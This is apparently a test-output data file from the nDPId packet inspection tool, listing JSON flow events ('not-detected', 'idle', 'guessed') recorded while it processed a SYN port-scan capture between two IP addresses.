-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 